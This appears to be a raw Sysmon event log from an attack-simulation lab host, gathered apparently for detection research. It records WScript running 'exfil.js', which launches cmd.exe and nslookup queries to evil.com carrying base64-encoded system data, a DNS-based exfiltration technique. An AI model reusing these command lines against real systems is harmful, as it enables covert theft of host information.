14:21:27.774{2E1864BB-18E7-629A-1043-000000005F02}61084808C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0F43-000000005F02}6520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.756{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1043-000000005F02}6108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0F43-000000005F02}6520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-18E0-629A-6742-000000005F02}39765696C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-0F43-000000005F02}6520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.752{2E1864BB-18E7-629A-0F43-000000005F02}6520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvvsqo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllpaoj.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000207489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.740{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDC3D90B9B11CF4A126D1AF872FA84A1,SHA256=DF1EA7CEACCAB8B417433B654BD13B65F3A0D0063D12551D26F953FC5E6298C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.724{2E1864BB-18E7-629A-0D43-000000005F02}33885400C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0E43-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.724{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.724{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.724{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.724{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0E43-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.724{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.724{2E1864BB-18E7-629A-0C43-000000005F02}42006688C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-0E43-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.727{2E1864BB-18E7-629A-0E43-000000005F02}5332C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-0C43-000000005F02}4200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllpaoj.tmp 2>&1 10341000x8000000000000000207480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.709{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0D43-000000005F02}3388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.709{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0D43-000000005F02}3388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.693{2E1864BB-18E7-629A-0D43-000000005F02}33885400C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0C43-000000005F02}4200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.693{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0D43-000000005F02}3388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.677{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.677{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.677{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.677{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.677{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0C43-000000005F02}4200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.677{2E1864BB-18E0-629A-6742-000000005F02}39763620C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-0C43-000000005F02}4200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.686{2E1864BB-18E7-629A-0C43-000000005F02}4200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllpaoj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.677{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldqnun.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.656{2E1864BB-18E7-629A-0A43-000000005F02}45565932C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0B43-000000005F02}7960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 